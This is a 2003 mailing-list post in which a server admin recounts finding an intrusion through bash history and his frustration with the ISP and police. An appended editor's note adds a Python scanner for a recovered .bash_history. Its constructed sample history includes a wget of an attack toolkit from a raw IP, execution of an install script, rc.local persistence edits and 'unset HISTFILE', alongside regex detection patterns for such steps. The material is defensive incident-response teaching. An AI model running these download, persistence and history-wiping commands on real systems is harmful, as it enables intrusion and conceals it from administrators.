ACK! -- CONTINUED

Bradley Miller bradmiller at dslonramp.com
Sun Apr 20 03:52:34 CDT 2003


At 08:18 PM 4/19/2003 -0700, you wrote:

>I'm just curious, what tipped you off that the box was
>compromised? Were there any obvious signs, or did you
>catch something in your logs?
>
>Kurt

Since there are a lot of people asking, I'll give you the details:

Actually discovered it purely by accident.  I have one server that is 
bouncing up and down, why I don't know.  I decided to restore my database 
backup onto one of my other servers and start running it as my secondary 
server in the interim.  While there I accidentally hit the down arrow to 
recall a previous command, and saw a peculiar instruction.  I looked in the 
bash history file and sure enough, I found the intruder.  They installed a 
"toolz" file to compromise the system and then a "clean me up" script to 
remove all traces of their activity.  Unfortunately for them, and 
fortunately for me, I could see where they were keying the server to 
respond to with all the info.

Now -- earlier today and this week, I've spent HOURS on the phone with 
Interland.  Communitech's servers went to Atlanta, Georgia a month ago or 
so.  I CANNOT RECOMMEND INTERLAND -- THEY ARE WAY TOO BIG FOR DECENT 
CUSTOMER SUPPORT!!!!  I just signed a contract earlier this week for two 
new servers over at Netstandard . . . I can only hope they go in fast 
enough to curb this problem.

Want to hear some really funny stuff?  I had snooped around and found 
where this little *%#$#'s IP was from, since they left some "traces" in my 
system.  I do an ARIN lookup and find the IP range is totally owned by one 
ISP.  I call up the ISP and get the runaround that to get the info, I'll 
need the police department to call.  I call up the local police department, 
explain the situation, call them back and then they tell the officer they 
can't do anything without a subpoena.  The officer can't do anything 
because my servers are in Atlanta, Georgia, so technically the crime has 
been committed there.  Now what are the odds that I'll get a cop in Atlanta 
to investigate this?  The ISP told me that they would probably just warn an 
individual if they found proof.  WARN THEM?  If I walk into a liquor store 
and walk out with a bottle of booze and a freakin' bag of money (without 
paying), how is it any different than doing the same to a server?  But 
the ISP won't let me see the freakin' security camera -- because it would 
be a privacy issue?  Give me a break!

-- Bradley Miller
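Editor's note: the message above describes finding the intrusion by reading the shell history, where the "toolz" install and the "clean me up" script were still visible. The following is an added example (not Bradley Miller's code, and not from the Kclug list) of the check a responder would run over a recovered .bash_history: flag commands that match the usual pattern of a download from a raw IP, archive extraction, making something executable, touching persistence locations, and history or log tampering. The sample history, the IP address 198.51.100.7 and the file names are constructed for the example and are not from the original post.

```python
import re

# Constructed sample ~/.bash_history (NOT the history from the compromised
# server in the post); one command per line, as bash writes it.
SAMPLE_HISTORY = """\
cd /var/www
ls -la
wget http://198.51.100.7/toolz.tgz
tar xzf toolz.tgz
cd toolz
chmod +x install.sh
./install.sh
vi /etc/rc.d/rc.local
sh cleanmeup.sh
unset HISTFILE
"""

# (regex, label). Patterns are deliberately broad: the point is to surface
# lines for a human to read, not to give a verdict on each one.
SUSPICIOUS = [
    (r"\b(wget|curl|ftp|lynx)\b.*\b\d{1,3}(\.\d{1,3}){3}\b", "download from raw IP"),
    (r"\b(tar|gunzip|unzip)\b.*\.(tgz|tar\.gz|tar|zip)\b", "archive extraction"),
    (r"\bchmod\s+\S*x\S*|\bchmod\s+[0-7]{3,4}\b", "made something executable"),
    (r"\b(rc\.local|rc\.d|crontab|inittab|\.bashrc|\.profile)\b", "persistence location"),
    (r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bHISTFILE=|\bHISTSIZE=0|\.bash_history",
     "history tampering"),
    (r"\b(clean|wipe|zap|hide)\w*\b", "cleanup / log-wiper name"),
]


def scan_history(text):
    """Return [(line_number, command, [labels...])] for every command that
    matches at least one SUSPICIOUS pattern. Lines that match nothing are
    omitted, so an empty result means nothing obvious was found (not that the
    box is clean)."""
    findings = []
    for lineno, cmd in enumerate(text.splitlines(), 1):
        labels = [label for pattern, label in SUSPICIOUS if re.search(pattern, cmd)]
        if labels:
            findings.append((lineno, cmd, labels))
    return findings


def history_looks_tampered(text):
    """True if the history itself shows signs of being disabled or wiped.
    A cleanup script that succeeds leaves no history at all, so an empty file
    on a server that is in daily use is also treated as a signal."""
    if not text.strip():
        return True
    return any("history tampering" in labels for _, _, labels in scan_history(text))


def report(text):
    """Print the findings in a form that is quick to read over a phone call."""
    for lineno, cmd, labels in scan_history(text):
        print(f"line {lineno:>4}: {cmd:<40} <- {', '.join(labels)}")
    if history_looks_tampered(text):
        print("history shows tampering: treat its contents as incomplete")


if __name__ == "__main__":
    report(SAMPLE_HISTORY)
```

The last line of the sample is the caveat: once an intruder runs `unset HISTFILE` or the cleanup script deletes .bash_history, the commands that follow are never written, so the history is evidence of what happened before the cleanup, not a complete record. Copy the file off the box before doing anything else on it, since the shell you log in with rewrites it on exit.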




More information about the Kclug mailing list